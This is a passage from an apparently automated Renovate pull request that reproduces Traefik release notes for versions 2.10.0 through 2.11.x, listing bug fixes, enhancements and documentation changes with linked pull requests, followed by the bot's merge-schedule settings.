([#10599](https://togithub.com/traefik/traefik/pull/10599) by [kevinpollet](https://togithub.com/kevinpollet)) - **\[server]** Set default ReadTimeout value to 60s ([#10602](https://togithub.com/traefik/traefik/pull/10602) by [rtribotte](https://togithub.com/rtribotte)) ### [`v2.11.1`](https://togithub.com/traefik/traefik/blob/HEAD/CHANGELOG.md#v2111-2024-04-10) [Compare Source](https://togithub.com/traefik/traefik/compare/v2.11.0...v2.11.1) [All Commits](https://togithub.com/traefik/traefik/compare/v2.11.0...v2.11.1) **Bug fixes:** - **\[acme,tls]** Enforce handling of ACME-TLS/1 challenges ([#10536](https://togithub.com/traefik/traefik/pull/10536) by [rtribotte](https://togithub.com/rtribotte)) - **\[acme]** Update go-acme/lego to v4.16.1 ([#10508](https://togithub.com/traefik/traefik/pull/10508) by [ldez](https://togithub.com/ldez)) - **\[acme]** Close created file in ACME local store CheckFile func ([#10574](https://togithub.com/traefik/traefik/pull/10574) by [testwill](https://togithub.com/testwill)) - **\[docker,http3]** Update to quic-go v0.42.0 and docker/cli v24.0.9 ([#10572](https://togithub.com/traefik/traefik/pull/10572) by [mloiseleur](https://togithub.com/mloiseleur)) - **\[docker,marathon,rancher,ecs,tls,nomad]** Allow to configure TLSStore default generated certificate with labels ([#10439](https://togithub.com/traefik/traefik/pull/10439) by [kevinpollet](https://togithub.com/kevinpollet)) - **\[ecs]** Adjust ECS network interface detection logic ([#10550](https://togithub.com/traefik/traefik/pull/10550) by [amaxine](https://togithub.com/amaxine)) - **\[logs,tls]** Fix log when default TLSStore and TLSOptions are defined multiple times ([#10499](https://togithub.com/traefik/traefik/pull/10499) by [rtribotte](https://togithub.com/rtribotte)) - **\[middleware]** Allow empty replacement with ReplacePathRegex middleware ([#10538](https://togithub.com/traefik/traefik/pull/10538) by [rtribotte](https://togithub.com/rtribotte)) - **\[plugins]** Update Yaegi to v0.16.1 ([#10565](https://togithub.com/traefik/traefik/pull/10565) by [ldez](https://togithub.com/ldez)) - **\[provider,rules]** Don't allow routers higher than internal ones ([#10428](https://togithub.com/traefik/traefik/pull/10428) by [ldez](https://togithub.com/ldez)) - **\[rules]** Reserve priority range for internal routers ([#10541](https://togithub.com/traefik/traefik/pull/10541) by [youkoulayley](https://togithub.com/youkoulayley)) - **\[server,tcp]** Introduce Lingering Timeout ([#10569](https://togithub.com/traefik/traefik/pull/10569) by [rtribotte](https://togithub.com/rtribotte)) - **\[tcp]** Enforce failure for TCP HostSNI with hostname ([#10540](https://togithub.com/traefik/traefik/pull/10540) by [youkoulayley](https://togithub.com/youkoulayley)) - **\[tracing]** Bump Elastic APM to v2.4.8 ([#10512](https://togithub.com/traefik/traefik/pull/10512) by [rtribotte](https://togithub.com/rtribotte)) - **\[webui]** Fix dashboard exposition through a router ([#10518](https://togithub.com/traefik/traefik/pull/10518) by [mmatur](https://togithub.com/mmatur)) - **\[webui]** Display IPAllowlist middleware configuration in dashboard ([#10459](https://togithub.com/traefik/traefik/pull/10459) by [youkoulayley](https://togithub.com/youkoulayley)) - **\[webui]** Make text more readable in dark mode ([#10473](https://togithub.com/traefik/traefik/pull/10473) by [hood](https://togithub.com/hood)) - **\[webui]** Migrate to Quasar 2.x and Vue.js 3.x ([#10416](https://togithub.com/traefik/traefik/pull/10416) by [andsarr](https://togithub.com/andsarr)) - **\[webui]** Add a horizontal scroll for the mobile view ([#10480](https://togithub.com/traefik/traefik/pull/10480) by [framebassman](https://togithub.com/framebassman)) **Documentation:** - **\[acme]** Update gandiv5 env variable in providers table ([#10506](https://togithub.com/traefik/traefik/pull/10506) by [dominiwe](https://togithub.com/dominiwe)) - **\[acme]** Fix multiple dns provider documentation ([#10496](https://togithub.com/traefik/traefik/pull/10496) by [mmatur](https://togithub.com/mmatur)) - **\[docker]** Fix paragraph in entrypoints and Docker docs ([#10491](https://togithub.com/traefik/traefik/pull/10491) by [luigir-it](https://togithub.com/luigir-it)) - **\[k8s]** Improve middleware example ([#10532](https://togithub.com/traefik/traefik/pull/10532) by [mloiseleur](https://togithub.com/mloiseleur)) - **\[metrics]** Fix host header mention in prometheus metrics doc ([#10502](https://togithub.com/traefik/traefik/pull/10502) by [MorphBonehunter](https://togithub.com/MorphBonehunter)) - **\[metrics]** Fix typo in statsd metrics docs ([#10437](https://togithub.com/traefik/traefik/pull/10437) by [xpac1985](https://togithub.com/xpac1985)) - **\[middleware]** Improve excludedIPs example with IPWhiteList and IPAllowList middleware ([#10554](https://togithub.com/traefik/traefik/pull/10554) by [mloiseleur](https://togithub.com/mloiseleur)) - **\[nomad]** Improve documentation about Nomad ACL minimum rights ([#10482](https://togithub.com/traefik/traefik/pull/10482) by [Thadir](https://togithub.com/Thadir)) - **\[server]** Add specification for TCP TLS routers in documentation ([#10510](https://togithub.com/traefik/traefik/pull/10510) by [shivanipawar00](https://togithub.com/shivanipawar00)) - **\[tls]** Fix default value for peerCertURI option ([#10470](https://togithub.com/traefik/traefik/pull/10470) by [marcmognol](https://togithub.com/marcmognol)) - Update releases page ([#10449](https://togithub.com/traefik/traefik/pull/10449) by [ldez](https://togithub.com/ldez)) - Update releases page ([#10443](https://togithub.com/traefik/traefik/pull/10443) by [ldez](https://togithub.com/ldez)) - Add youkoulayley to maintainers ([#10517](https://togithub.com/traefik/traefik/pull/10517) by [emilevauge](https://togithub.com/emilevauge)) - Add sdelicata to maintainers ([#10515](https://togithub.com/traefik/traefik/pull/10515) by [emilevauge](https://togithub.com/emilevauge)) **Misc:** - **\[webui]** Modify the Hub Button ([#10583](https://togithub.com/traefik/traefik/pull/10583) by [mdeliatf](https://togithub.com/mdeliatf)) ### [`v2.11.0`](https://togithub.com/traefik/traefik/blob/HEAD/CHANGELOG.md#v2110-2024-02-12) [Compare Source](https://togithub.com/traefik/traefik/compare/v2.10.7...v2.11.0) [All Commits](https://togithub.com/traefik/traefik/compare/v2.11.0-rc1...v2.11.0) **Enhancements:** - **\[middleware]** Deprecate IPWhiteList middleware in favor of IPAllowList ([#10249](https://togithub.com/traefik/traefik/pull/10249) by [lbenguigui](https://togithub.com/lbenguigui)) - **\[redis]** Add Redis Sentinel support ([#10245](https://togithub.com/traefik/traefik/pull/10245) by [youkoulayley](https://togithub.com/youkoulayley)) - **\[server]** Add KeepAliveMaxTime and KeepAliveMaxRequests features to entrypoints ([#10247](https://togithub.com/traefik/traefik/pull/10247) by [juliens](https://togithub.com/juliens)) - **\[sticky-session]** Hash WRR sticky cookies ([#10243](https://togithub.com/traefik/traefik/pull/10243) by [youkoulayley](https://togithub.com/youkoulayley)) **Bug fixes:** - **\[acme]** Update go-acme/lego to v4.15.0 ([#10392](https://togithub.com/traefik/traefik/pull/10392) by [ldez](https://togithub.com/ldez)) - **\[authentication]** Fix NTLM and Kerberos ([#10405](https://togithub.com/traefik/traefik/pull/10405) by [juliens](https://togithub.com/juliens)) - **\[file]** Fix file watcher ([#10420](https://togithub.com/traefik/traefik/pull/10420) by [juliens](https://togithub.com/juliens)) - **\[file]** Update github.com/fsnotify/fsnotify to v1.7.0 ([#10313](https://togithub.com/traefik/traefik/pull/10313) by [ldez](https://togithub.com/ldez)) - **\[http3]** Update quic-go to v0.40.1 ([#10296](https://togithub.com/traefik/traefik/pull/10296) by [ldez](https://togithub.com/ldez)) - **\[middleware,tcp]** Add missing TCP IPAllowList middleware constructor ([#10331](https://togithub.com/traefik/traefik/pull/10331) by [youkoulayley](https://togithub.com/youkoulayley)) - **\[nomad]** Update the Nomad API dependency to v1.7.2 ([#10327](https://togithub.com/traefik/traefik/pull/10327) by [jrasell](https://togithub.com/jrasell)) - **\[server]** Fix ReadHeaderTimeout for PROXY protocol ([#10320](https://togithub.com/traefik/traefik/pull/10320) by [juliens](https://togithub.com/juliens)) - **\[webui]** Fixes the Header Button ([#10395](https://togithub.com/traefik/traefik/pull/10395) by [mdeliatf](https://togithub.com/mdeliatf)) - **\[webui]** Fix URL encode resource's id before calling API endpoints ([#10292](https://togithub.com/traefik/traefik/pull/10292) by [andsarr](https://togithub.com/andsarr)) **Documentation:** - **\[acme]** Fix TLS challenge explanation ([#10293](https://togithub.com/traefik/traefik/pull/10293) by [cavokz](https://togithub.com/cavokz)) - **\[docker]** Update wording of compose example ([#10276](https://togithub.com/traefik/traefik/pull/10276) by [svx](https://togithub.com/svx)) - **\[docker,acme]** Fix typo ([#10294](https://togithub.com/traefik/traefik/pull/10294) by [youpsla](https://togithub.com/youpsla)) - **\[ecs]** Mention ECS as supported backend ([#10393](https://togithub.com/traefik/traefik/pull/10393) by [aleyrizvi](https://togithub.com/aleyrizvi)) - **\[k8s/crd]** Adjust deprecation notice for Kubernetes CRD provider ([#10317](https://togithub.com/traefik/traefik/pull/10317) by [rtribotte](https://togithub.com/rtribotte)) - **\[middleware]** Update the documentation for RateLimit to provide a better example ([#10298](https://togithub.com/traefik/traefik/pull/10298) by [rmburton](https://togithub.com/rmburton)) - **\[server]** Fix the keepAlive options for the CLI examples ([#10398](https://togithub.com/traefik/traefik/pull/10398) by [immanuelfodor](https://togithub.com/immanuelfodor)) - Prepare release v2.11.0-rc2 ([#10384](https://togithub.com/traefik/traefik/pull/10384) by [rtribotte](https://togithub.com/rtribotte)) - Improve Concepts documentation page ([#10315](https://togithub.com/traefik/traefik/pull/10315) by [oliver-dvorski](https://togithub.com/oliver-dvorski)) - Prepare release v2.11.0-rc1 ([#10326](https://togithub.com/traefik/traefik/pull/10326) by [mmatur](https://togithub.com/mmatur)) - Fix description for anonymous usage statistics references ([#10287](https://togithub.com/traefik/traefik/pull/10287) by [ariyonaty](https://togithub.com/ariyonaty)) - Documentation enhancements ([#10261](https://togithub.com/traefik/traefik/pull/10261) by [svx](https://togithub.com/svx)) ### [`v2.10.7`](https://togithub.com/traefik/traefik/blob/HEAD/CHANGELOG.md#v2107-2023-12-06) [Compare Source](https://togithub.com/traefik/traefik/compare/v2.10.6...v2.10.7) [All Commits](https://togithub.com/traefik/traefik/compare/v2.10.6...v2.10.7) **Bug fixes:** - **\[logs]** Fixed datadog logs json format issue ([#10233](https://togithub.com/traefik/traefik/pull/10233) by [sssash18](https://togithub.com/sssash18)) ### [`v2.10.6`](https://togithub.com/traefik/traefik/blob/HEAD/CHANGELOG.md#v2106-2023-11-28) [Compare Source](https://togithub.com/traefik/traefik/compare/v2.10.5...v2.10.6) [All Commits](https://togithub.com/traefik/traefik/compare/v2.10.5...v2.10.6) **Bug fixes:** - **\[acme]** Remove backoff for http challenge ([#10224](https://togithub.com/traefik/traefik/pull/10224) by [youkoulayley](https://togithub.com/youkoulayley)) - **\[consul,consulcatalog]** Update github.com/hashicorp/consul/api ([#10220](https://togithub.com/traefik/traefik/pull/10220) by [kevinpollet](https://togithub.com/kevinpollet)) - **\[http3]** Update quic-go to v0.39.1 ([#10171](https://togithub.com/traefik/traefik/pull/10171) by [tomMoulard](https://togithub.com/tomMoulard)) - **\[middleware]** Fix stripPrefix middleware is not applied to retried attempts ([#10255](https://togithub.com/traefik/traefik/pull/10255) by [niki-timofe](https://togithub.com/niki-timofe)) - **\[provider]** Refuse recursive requests ([#10242](https://togithub.com/traefik/traefik/pull/10242) by [rtribotte](https://togithub.com/rtribotte)) - **\[server]** Deny request with fragment in URL path ([#10229](https://togithub.com/traefik/traefik/pull/10229) by [lbenguigui](https://togithub.com/lbenguigui)) - **\[tracing]** Remove deprecated code usage for datadog tracer ([#10196](https://togithub.com/traefik/traefik/pull/10196) by [mmatur](https://togithub.com/mmatur)) **Documentation:** - **\[governance]** Update the review process and maintainers team documentation ([#10230](https://togithub.com/traefik/traefik/pull/10230) by [geraldcroes](https://togithub.com/geraldcroes)) - **\[governance]** Guidelines Update ([#10197](https://togithub.com/traefik/traefik/pull/10197) by [geraldcroes](https://togithub.com/geraldcroes)) - **\[metrics]** Add a mention for the host header in metrics headers labels doc ([#10172](https://togithub.com/traefik/traefik/pull/10172) by [rtribotte](https://togithub.com/rtribotte)) - **\[middleware]** Rephrase BasicAuth and DigestAuth docs ([#10226](https://togithub.com/traefik/traefik/pull/10226) by [sssash18](https://togithub.com/sssash18)) - **\[middleware]** Improve ErrorPages examples ([#10209](https://togithub.com/traefik/traefik/pull/10209) by [arendhummeling](https://togithub.com/arendhummeling)) - Add [@lbenguigui](https://togithub.com/lbenguigui) to maintainers ([#10222](https://togithub.com/traefik/traefik/pull/10222) by [kevinpollet](https://togithub.com/kevinpollet)) ### [`v2.10.5`](https://togithub.com/traefik/traefik/blob/HEAD/CHANGELOG.md#v2105-2023-10-11) [Compare Source](https://togithub.com/traefik/traefik/compare/v2.10.4...v2.10.5) [All Commits](https://togithub.com/traefik/traefik/compare/v2.10.4...v2.10.5) **Bug fixes:** - **\[accesslogs]** Move origin fields capture to service level ([#10126](https://togithub.com/traefik/traefik/pull/10126) by [rtribotte](https://togithub.com/rtribotte)) - **\[accesslogs]** Fix preflight response status in access logs ([#10142](https://togithub.com/traefik/traefik/pull/10142) by [rtribotte](https://togithub.com/rtribotte)) - **\[acme]** Update go-acme/lego to v4.14.0 ([#10087](https://togithub.com/traefik/traefik/pull/10087) by [ldez](https://togithub.com/ldez)) - **\[acme]** Update go-acme/lego to v4.13.3 ([#10077](https://togithub.com/traefik/traefik/pull/10077) by [ldez](https://togithub.com/ldez)) - **\[http3]** Update quic-go to v0.37.5 ([#10083](https://togithub.com/traefik/traefik/pull/10083) by [ldez](https://togithub.com/ldez)) - **\[http3]** Update quic-go to v0.39.0 ([#10137](https://togithub.com/traefik/traefik/pull/10137) by [ldez](https://togithub.com/ldez)) - **\[http3]** Update quic-go to v0.37.6 ([#10085](https://togithub.com/traefik/traefik/pull/10085) by [ldez](https://togithub.com/ldez)) - **\[http3]** Update quic-go to v0.38.0 ([#10086](https://togithub.com/traefik/traefik/pull/10086) by [ldez](https://togithub.com/ldez)) - **\[http3]** Update quic-go to v0.38.1 ([#10090](https://togithub.com/traefik/traefik/pull/10090) by [ldez](https://togithub.com/ldez)) - **\[kv]** Ignore ErrKeyNotFound error for the KV provider ([#10082](https://togithub.com/traefik/traefik/pull/10082) by [sunyakun](https://togithub.com/sunyakun)) - **\[middleware,authentication]** Adjust forward auth to avoid connection leak ([#10096](https://togithub.com/traefik/traefik/pull/10096) by [wdhongtw](https://togithub.com/wdhongtw)) - **\[middleware,server]** Improve CNAME flattening to avoid unnecessary error logging ([#10128](https://togithub.com/traefik/traefik/pull/10128) by [niallnsec](https://togithub.com/niallnsec)) - **\[middleware]** Allow X-Forwarded-For delete operation ([#10132](https://togithub.com/traefik/traefik/pull/10132) by [rtribotte](https://togithub.com/rtribotte)) - **\[server]** Update x/net and grpc/grpc-go ([#10161](https://togithub.com/traefik/traefik/pull/10161) by [rtribotte](https://togithub.com/rtribotte)) - **\[webui]** Add missing accessControlAllowOriginListRegex to middleware view ([#10157](https://togithub.com/traefik/traefik/pull/10157) by [DBendit](https://togithub.com/DBendit)) - Fix false positive in url anonymization ([#10138](https://togithub.com/traefik/traefik/pull/10138) by [jspdown](https://togithub.com/jspdown)) **Documentation:** - **\[acme]** Change Arvancloud URL ([#10115](https://togithub.com/traefik/traefik/pull/10115) by [sajjadjafaribojd](https://togithub.com/sajjadjafaribojd)) - **\[acme]** Correct minor typo in crd-acme docs ([#10067](https://togithub.com/traefik/traefik/pull/10067) by [ayyron-lmao](https://togithub.com/ayyron-lmao)) - **\[healthcheck]** Remove healthcheck interval configuration warning ([#10068](https://togithub.com/traefik/traefik/pull/10068) by [rtribotte](https://togithub.com/rtribotte)) - **\[kv,redis]** Docs describe the missing db parameter in redis provider ([#10052](https://togithub.com/traefik/traefik/pull/10052) by [tokers](https://togithub.com/tokers)) - **\[middleware]** Doc fix accessControlAllowHeaders examples ([#10121](https://togithub.com/traefik/traefik/pull/10121) by [ebuildy](https://togithub.com/ebuildy)) - Updates business callout in the documentation ([#10122](https://togithub.com/traefik/traefik/pull/10122) by [tomatokoolaid](https://togithub.com/tomatokoolaid)) ### [`v2.10.4`](https://togithub.com/traefik/traefik/blob/HEAD/CHANGELOG.md#v2104-2023-07-24) [Compare Source](https://togithub.com/traefik/traefik/compare/v2.10.3...v2.10.4) [All Commits](https://togithub.com/traefik/traefik/compare/v2.10.3...v2.10.4) **Bug fixes:** - **\[acme]** Update go-acme/lego to v4.13.2 ([#10036](https://togithub.com/traefik/traefik/pull/10036) by [ldez](https://togithub.com/ldez)) - **\[acme]** Update go-acme/lego to v4.13.0 ([#10029](https://togithub.com/traefik/traefik/pull/10029) by [ldez](https://togithub.com/ldez)) - **\[k8s/ingress,k8s]** fix: avoid panic on resource backends ([#10023](https://togithub.com/traefik/traefik/pull/10023) by [ldez](https://togithub.com/ldez)) - **\[middleware,tracing,plugins]** fix: traceability of the middleware plugins ([#10028](https://togithub.com/traefik/traefik/pull/10028) by [ldez](https://togithub.com/ldez)) **Documentation:** - Update maintainers guidelines ([#9981](https://togithub.com/traefik/traefik/pull/9981) by [geraldcroes](https://togithub.com/geraldcroes)) - Update release documentation ([#9975](https://togithub.com/traefik/traefik/pull/9975) by [rtribotte](https://togithub.com/rtribotte)) **Misc:** - **\[webui]** Updates the Hub tooltip content using a web component and adds an option to disable Hub button ([#10008](https://togithub.com/traefik/traefik/pull/10008) by [mdeliatf](https://togithub.com/mdeliatf)) ### [`v2.10.3`](https://togithub.com/traefik/traefik/blob/HEAD/CHANGELOG.md#v2103-2023-06-17) [Compare Source](https://togithub.com/traefik/traefik/compare/v2.10.2...v2.10.3) [All Commits](https://togithub.com/traefik/traefik/compare/v2.10.2...v2.10.3) **Bug fixes:** - **\[acme]** Update go-acme/lego to v4.12.2 ([#9935](https://togithub.com/traefik/traefik/pull/9971) by [ldez](https://togithub.com/ldez)) ### [`v2.10.2`](https://togithub.com/traefik/traefik/blob/HEAD/CHANGELOG.md#v2102-2023-06-17) [Compare Source](https://togithub.com/traefik/traefik/compare/v2.10.1...v2.10.2) [All Commits](https://togithub.com/traefik/traefik/compare/v2.10.1...v2.10.2) **Bug fixes:** - **\[acme]** Update go-acme/lego to v4.12.1 ([#9935](https://togithub.com/traefik/traefik/pull/9935) by [ldez](https://togithub.com/ldez)) - **\[acme]** Update go-acme/lego to v4.12.0 ([#9918](https://togithub.com/traefik/traefik/pull/9918) by [ldez](https://togithub.com/ldez)) - **\[acme]** Update go-acme/lego to v4.11.0 ([#9883](https://togithub.com/traefik/traefik/pull/9883) by [ldez](https://togithub.com/ldez)) - **\[acme]** Do not check for wildcard domains for non DNS challenge ([#9881](https://togithub.com/traefik/traefik/pull/9881) by [erkexzcx](https://togithub.com/erkexzcx)) - **\[k8s/crd]** Fix multiple subsets endpoint ([#9914](https://togithub.com/traefik/traefik/pull/9914) by [joaosilva15](https://togithub.com/joaosilva15)) - **\[k8s/ingress,k8s/crd,k8s,hub]** Clean code related to Hub ([#9894](https://togithub.com/traefik/traefik/pull/9894) by [ldez](https://togithub.com/ldez)) - **\[metrics]** Enable Prometheus provider cleanup when only the router's metrics level is activated ([#9887](https://togithub.com/traefik/traefik/pull/9887) by [rtribotte](https://togithub.com/rtribotte)) - **\[middleware]** Encode query semicolons ([#9943](https://togithub.com/traefik/traefik/pull/9943) by [LandryBe](https://togithub.com/LandryBe)) - **\[middleware]** Missing trailer with custom errors middleware ([#9942](https://togithub.com/traefik/traefik/pull/9942) by [rtribotte](https://togithub.com/rtribotte)) - **\[middleware]** Support informational headers in middlewares redefining the response writer. ([#9938](https://togithub.com/traefik/traefik/pull/9938) by [rtribotte](https://togithub.com/rtribotte)) - **\[plugins]** Improve error messages related to plugins ([#9924](https://togithub.com/traefik/traefik/pull/9924) by [ldez](https://togithub.com/ldez)) - **\[tracing]** Update DataDog tracing dependency to v1.50.1 ([#9953](https://togithub.com/traefik/traefik/pull/9953) by [der-eismann](https://togithub.com/der-eismann)) **Documentation:** - **\[accesslogs]** Fix over-indented yaml configuration of access logs ([#9930](https://togithub.com/traefik/traefik/pull/9930) by [ufUNnxagpM](https://togithub.com/ufUNnxagpM)) - **\[tls]** Add FAQ documentation about TLS certificates ([#9868](https://togithub.com/traefik/traefik/pull/9868) by [rtribotte](https://togithub.com/rtribotte)) - Fix typo ([#9966](https://togithub.com/traefik/traefik/pull/9966) by [green1052](https://togithub.com/green1052)) - Add business callouts ([#9940](https://togithub.com/traefik/traefik/pull/9940) by [tomatokoolaid](https://togithub.com/tomatokoolaid)) - Add logo for GitHub dark mode ([#9890](https://togithub.com/traefik/traefik/pull/9890) by [ldez](https://togithub.com/ldez)) ### [`v2.10.1`](https://togithub.com/traefik/traefik/blob/HEAD/CHANGELOG.md#v2101-2023-04-27) [Compare Source](https://togithub.com/traefik/traefik/compare/v2.10.0...v2.10.1) [All Commits](https://togithub.com/traefik/traefik/compare/v2.10.0...v2.10.1) **Bug fixes:** - **\[middleware,oxy]** Update vulcand/oxy to [`be5cf38`](https://togithub.com/traefik/traefik/commit/be5cf38) ([#9874](https://togithub.com/traefik/traefik/pull/9874) by [rtribotte](https://togithub.com/rtribotte)) **Documentation:** - Fix v2.10 migration guide ([#9863](https://togithub.com/traefik/traefik/pull/9863) by [rtribotte](https://togithub.com/rtribotte)) ### [`v2.10.0`](https://togithub.com/traefik/traefik/blob/HEAD/CHANGELOG.md#v2100-2023-04-24) [Compare Source](https://togithub.com/traefik/traefik/compare/v2.9.10...v2.10.0) [All Commits](https://togithub.com/traefik/traefik/compare/v2.9.0-rc1...v2.10.0) **Enhancements:** - **\[docker]** Expose ContainerName in Docker provider ([#9770](https://togithub.com/traefik/traefik/pull/9770) by [quinot](https://togithub.com/quinot)) - **\[hub]** Remove hub configuration out of experimental ([#9792](https://togithub.com/traefik/traefik/pull/9792) by [mpl](https://togithub.com/mpl)) - **\[k8s/crd]** Introduce traefik.io API Group CRDs ([#9765](https://togithub.com/traefik/traefik/pull/9765) by [rtribotte](https://togithub.com/rtribotte)) - **\[k8s/ingress,k8s/crd,k8s]** Native Kubernetes service load-balancing ([#9740](https://togithub.com/traefik/traefik/pull/9740) by [rtribotte](https://togithub.com/rtribotte)) - **\[middleware,metrics]** Add prometheus metric requests_total with headers ([#9783](https://togithub.com/traefik/traefik/pull/9783) by [rtribotte](https://togithub.com/rtribotte)) - **\[nomad]** Support multiple namespaces in the Nomad Provider ([#9794](https://togithub.com/traefik/traefik/pull/9794) by [rtribotte](https://togithub.com/rtribotte)) - **\[tracing]** Add support to send DataDog traces via Unix Socket ([#9714](https://togithub.com/traefik/traefik/pull/9714) by [der-eismann](https://togithub.com/der-eismann)) - **\[webui]** Modify the Hub Button ([#9851](https://togithub.com/traefik/traefik/pull/9851) by [mdeliatf](https://togithub.com/mdeliatf)) - **\[webui]** Display period setting of the RateLimit middleware in the webui ([#9822](https://togithub.com/traefik/traefik/pull/9822) by [smatyas](https://togithub.com/smatyas)) **Bug fixes:** - **\[docker]** Only warn about missing docker network when network_mode is not host or container ([#9799](https://togithub.com/traefik/traefik/pull/9799) by [sentriz](https://togithub.com/sentriz)) - **\[k8s/ingress,k8s]** Bump k8s.io/client-go from v0.22.1 to v0.26.3 ([#9808](https://togithub.com/traefik/traefik/pull/9808) by [ldez](https://togithub.com/ldez)) - **\[plugins]** Improve DeepCopy of PluginConf ([#9846](https://togithub.com/traefik/traefik/pull/9846) by [ldez](https://togithub.com/ldez)) - **\[plugins]** Update Yaegi to v0.15.1 ([#9815](https://togithub.com/traefik/traefik/pull/9815) by [ldez](https://togithub.com/ldez)) - **\[server]** Update vulcand/oxy to [`03de175`](https://togithub.com/traefik/traefik/commit/03de175b3822) ([#9849](https://togithub.com/traefik/traefik/pull/9849) by [longit644](https://togithub.com/longit644)) **Documentation:** - Prepare release v2.10.0-rc1 ([#9802](https://togithub.com/traefik/traefik/pull/9802) by [ldez](https://togithub.com/ldez)) - Fix order of log levels ([#9791](https://togithub.com/traefik/traefik/pull/9791) by [svx](https://togithub.com/svx)) - **\[docker]** Update wording - add link descriptions ([#9816](https://togithub.com/traefik/traefik/pull/9816) by [svx](https://togithub.com/svx)) - **\[middleware]** Add accessControlAllowHeaders example ([#9810](https://togithub.com/traefik/traefik/pull/9810) by [yingshaoxo](https://togithub.com/yingshaoxo)) - **\[tls]** More details on Kubernetes options for mTLS ([#9835](https://togithub.com/traefik/traefik/pull/9835) by [mloiseleur](https://togithub.com/mloiseleur)) - Prepare release v2.10.0-rc2 ([#9830](https://togithub.com/traefik/traefik/pull/9830) by [mpl](https://togithub.com/mpl)) - Update Call To Actions ([#9824](https://togithub.com/traefik/traefik/pull/9824) by [svx](https://togithub.com/svx)) - Improve concepts page ([#9813](https://togithub.com/traefik/traefik/pull/9813) by [svx](https://togithub.com/svx)) - Update wording ([#9811](https://togithub.com/traefik/traefik/pull/9811) by [svx](https://togithub.com/svx)) **Misc:** - Merge branch v2.9 into v2.10 ([#9798](https://togithub.com/traefik/traefik/pull/9798) by [ldez](https://togithub.com/ldez)) - Merge branch v2.9 into v2.10 ([#9829](https://togithub.com/traefik/traefik/pull/9829) by [mpl](https://togithub.com/mpl))Configuration
📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 Ignore: Close this PR and you won't be reminded about this update again.
This PR was generated by Mend Renovate. View the repository job log.